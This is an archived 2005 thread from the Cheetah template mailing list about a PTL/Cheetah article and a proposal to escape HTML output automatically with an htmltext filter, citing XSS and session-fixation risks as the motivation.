Loading ...
Sorry, an error occurred while loading the content.

[Cheetahtemplate-discuss] PTL/Cheetah article

Expand Messages
  • mso@oz.net
    Here s an article I wrote about PTL and Cheetah. http://linuxgazette.net/117/orr.html -- -- Mike Orr ... SF.Net email is Sponsored by the Better
    Message 1 of 3 , Aug 3, 2005
    • 0 Attachment
      Here's an article I wrote about PTL and Cheetah.

      http://linuxgazette.net/117/orr.html


      --
      -- Mike Orr <mso@...>



      -------------------------------------------------------
      SF.Net email is Sponsored by the Better Software Conference & EXPO
      September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices
      Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA
      Security * Process Improvement & Measurement * http://www.sqe.com/bsce5sf
      _______________________________________________
      Cheetahtemplate-discuss mailing list
      Cheetahtemplate-discuss@...
      https://lists.sourceforge.net/lists/listinfo/cheetahtemplate-discuss
    • Shannon -jj Behrens
      Mike, You bring up a good point about auto escaping. I read about session injection attacks , and a single
      Message 2 of 3 , Aug 3, 2005
      • 0 Attachment
        Mike,

        You bring up a good point about auto escaping. I read about session
        injection attacks <http://www.acros.si/papers/session_fixation.pdf>,
        and a single XSS vulnerability anywhere within some
        subdomain.example.com makes it possible to hijack sessions for
        anyothersubdomain.example.com. It's probably better if we start
        erring on the side of overcaution when it comes to HTML escaping
        things.

        Hence, I think that perhaps:

        - a NameMapper filter should automatically escape things as you laid
        out in your article
        - each Cheetah method should return an htmltext instance so that its
        content doesn't get re-escaped

        Best Regards,
        -jj

        On 8/3/05, mso@... <mso@...> wrote:
        > Here's an article I wrote about PTL and Cheetah.
        >
        > http://linuxgazette.net/117/orr.html

        --
        I have decided to switch to Gmail, but messages to my Yahoo account will
        still get through.


        -------------------------------------------------------
        SF.Net email is Sponsored by the Better Software Conference & EXPO
        September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices
        Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA
        Security * Process Improvement & Measurement * http://www.sqe.com/bsce5sf
        _______________________________________________
        Cheetahtemplate-discuss mailing list
        Cheetahtemplate-discuss@...
        https://lists.sourceforge.net/lists/listinfo/cheetahtemplate-discuss
      • Mike Orr
        ... Tavis would have to add the htmlttext module, perhaps under Cheetah.Utils . I don t know how he feels about that. If we include the C version, it would be
        Message 3 of 3 , Aug 3, 2005
        • 0 Attachment
          Shannon -jj Behrens wrote:

          >You bring up a good point about auto escaping. I read about session
          >injection attacks <http://www.acros.si/papers/session_fixation.pdf>,
          >and a single XSS vulnerability anywhere within some
          >subdomain.example.com makes it possible to hijack sessions for
          >anyothersubdomain.example.com. It's probably better if we start
          >erring on the side of overcaution when it comes to HTML escaping
          >things.
          >
          >

          Tavis would have to add the htmlttext module, perhaps under
          Cheetah.Utils . I don't know how he feels about that.

          If we include the C version, it would be one more thing to compile, but
          I suppose that's no big deal.

          >Hence, I think that perhaps:
          >
          >- a NameMapper filter should automatically escape things as you laid
          >out in your article
          >
          >

          Perhaps we can come up with a better name than HtmltextFilter.
          WebSafer? IntelligentWebSafe? Just kidding.

          >- each Cheetah method should return an htmltext instance so that its
          >content doesn't get re-escaped
          >
          >

          I suppose. It certainly works to assign htmltext instances as
          placeholder values. There may be an argument that we shouldn't presume
          that about all #def results, although PTL does the equivalent. The
          application I used the filter in doesn't have any #def methods so the
          issue never came up. But if a method result is fed to a function that
          insists on a string, there would be problems. I don't know how many of
          that sort of expectation ppl build into their templates.

          Of course, PTL also distinguishes between html functions and plain
          functions. Plain functions don't get any escaping. Cheetah doesn't
          have a formal way to distinguish between HTML output and non-HTML
          output. If it did we could make HtmltextFilter the default for HTML output.

          -- Mike Orr <mso@...>


          -------------------------------------------------------
          SF.Net email is Sponsored by the Better Software Conference & EXPO
          September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices
          Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA
          Security * Process Improvement & Measurement * http://www.sqe.com/bsce5sf
          _______________________________________________
          Cheetahtemplate-discuss mailing list
          Cheetahtemplate-discuss@...
          https://lists.sourceforge.net/lists/listinfo/cheetahtemplate-discuss
        Your message has been successfully submitted and would be delivered to recipients shortly.